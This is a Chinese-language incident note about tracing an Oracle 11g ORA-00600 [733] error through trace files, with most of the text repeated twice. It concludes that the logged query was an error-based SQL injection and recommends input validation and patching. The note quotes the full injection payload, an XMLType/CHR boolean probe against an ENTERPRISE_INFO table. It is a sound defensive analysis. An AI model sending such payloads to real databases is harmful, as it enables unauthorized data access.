2016年第一季度某平台的巡检中,在oracle数据库的告警日志中发现如下报错:
根据告警信息查看相关的trc文件:
Trace file /home/orabase/diag/rdbms/****/****/trace/****_ora_3408096.trc
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
ORACLE_HOME = /home/orabase/product/db/11203
System name: AIX
Node name: ****
Release: 1
Version: 6
Machine: *********
Instance name: ****
Redo thread mounted by this instance: 1
Oracle process number: 266
Unix process pid: 3408096, image: oracle@****
*** 2016-03-18 00:49:20.826
*** SESSION ID:(1977.61609) 2016-03-18 00:49:20.826
*** CLIENT ID:() 2016-03-18 00:49:20.826
*** SERVICE NAME:(SYS$USERS) 2016-03-18 00:49:20.826
*** MODULE NAME:() 2016-03-18 00:49:20.826
*** ACTION NAME:() 2016-03-18 00:49:20.826
Incident 51281 created, dump file: /home/orabase/diag/rdbms/****/****/incident/incdir_51281/****_ora_3408096_i51281.trc
ORA-00600: 内部错误代码, 参数: [733], [558979440], [pga heap], [], [], [], [], [], [], [], [], []
再查看****_ora_3408096_i51281.trc信息如下:
*** 2016-03-18 00:49:20.842
*** SESSION ID:(1977.61609) 2016-03-18 00:49:20.842
*** CLIENT ID:() 2016-03-18 00:49:20.842
*** SERVICE NAME:(SYS$USERS) 2016-03-18 00:49:20.842
*** MODULE NAME:() 2016-03-18 00:49:20.842
*** ACTION NAME:() 2016-03-18 00:49:20.842
Dump continued from file: /home/orabase/diag/rdbms/****/****/trace/****_ora_3408096.trc
ORA-00600: 内部错误代码, 参数:[733], [558979440], [pga heap], [], [], [], [], [], [], [], [], []
========= Dump for incident 51281 (ORA 600 [733]) ========
*** 2016-03-18 00:49:20.862
dbkedDefDump(): Starting incident default dumps (flags=0x2, level=3, mask=0x0)
----- Current SQL Statement for this session (sql_id=4dgy5ydm4qux1) -----
select ENTERPRISEID,STATUS from ENTERPRISE_INFO e where e.ENTERPRISECODE='-8838' OR 4914=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4914=4914) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'eCHY'='eCHY'
在****_ora_3408096.trc发现有SQL语句如下:
select ENTERPRISEID,STATUS from ENTERPRISE_INFO e where e.ENTERPRISECODE='-8838' OR 4914=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4914=4914) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'eCHY'='eCHY'
该SQL语句是典型的Oracle AND error-based的SQL注入攻击,相关修复方法就是对SQL语句参数进行校验过滤,数据库系统进行安全扫描并进行漏洞修复。
根据告警信息查看相关的trc文件:
Trace file /home/orabase/diag/rdbms/****/****/trace/****_ora_3408096.trc
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
ORACLE_HOME = /home/orabase/product/db/11203
System name: AIX
Node name: ****
Release: 1
Version: 6
Machine: *********
Instance name: ****
Redo thread mounted by this instance: 1
Oracle process number: 266
Unix process pid: 3408096, image: oracle@****
*** 2016-03-18 00:49:20.826
*** SESSION ID:(1977.61609) 2016-03-18 00:49:20.826
*** CLIENT ID:() 2016-03-18 00:49:20.826
*** SERVICE NAME:(SYS$USERS) 2016-03-18 00:49:20.826
*** MODULE NAME:() 2016-03-18 00:49:20.826
*** ACTION NAME:() 2016-03-18 00:49:20.826
Incident 51281 created, dump file: /home/orabase/diag/rdbms/****/****/incident/incdir_51281/****_ora_3408096_i51281.trc
ORA-00600: 内部错误代码, 参数: [733], [558979440], [pga heap], [], [], [], [], [], [], [], [], []
再查看****_ora_3408096_i51281.trc信息如下:
*** 2016-03-18 00:49:20.842
*** SESSION ID:(1977.61609) 2016-03-18 00:49:20.842
*** CLIENT ID:() 2016-03-18 00:49:20.842
*** SERVICE NAME:(SYS$USERS) 2016-03-18 00:49:20.842
*** MODULE NAME:() 2016-03-18 00:49:20.842
*** ACTION NAME:() 2016-03-18 00:49:20.842
Dump continued from file: /home/orabase/diag/rdbms/****/****/trace/****_ora_3408096.trc
ORA-00600: 内部错误代码, 参数:[733], [558979440], [pga heap], [], [], [], [], [], [], [], [], []
========= Dump for incident 51281 (ORA 600 [733]) ========
*** 2016-03-18 00:49:20.862
dbkedDefDump(): Starting incident default dumps (flags=0x2, level=3, mask=0x0)
----- Current SQL Statement for this session (sql_id=4dgy5ydm4qux1) -----
select ENTERPRISEID,STATUS from ENTERPRISE_INFO e where e.ENTERPRISECODE='-8838' OR 4914=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4914=4914) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'eCHY'='eCHY'
在****_ora_3408096.trc发现有SQL语句如下:
select ENTERPRISEID,STATUS from ENTERPRISE_INFO e where e.ENTERPRISECODE='-8838' OR 4914=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4914=4914) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'eCHY'='eCHY'
该SQL语句是典型的Oracle AND error-based的SQL注入攻击,相关修复方法就是对SQL语句参数进行校验过滤,数据库系统进行安全扫描并进行漏洞修复。
